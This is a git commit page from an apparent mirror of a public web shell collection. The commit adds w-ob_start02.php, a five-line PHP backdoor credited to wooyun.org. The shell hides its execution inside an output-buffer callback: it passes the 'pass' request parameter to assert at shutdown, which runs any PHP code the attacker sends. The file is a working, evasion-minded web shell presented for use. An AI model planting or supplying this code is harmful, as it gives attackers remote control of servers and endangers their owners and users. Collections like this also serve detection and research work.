1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 12:51:28 +00:00

add w-ob_start02.php

author : isno
from : wooyun.org

success running PHP5.3.3 >=
This commit is contained in:
tennc
2015-10-29 20:30:34 +08:00
parent e046b28382
commit 0d5688e8eb

View File

@@ -0,0 +1,5 @@
<?php
ob_start(function ($c,$d){register_shutdown_function('assert',$c);});
echo $_REQUEST['pass'];
ob_end_flush();
?>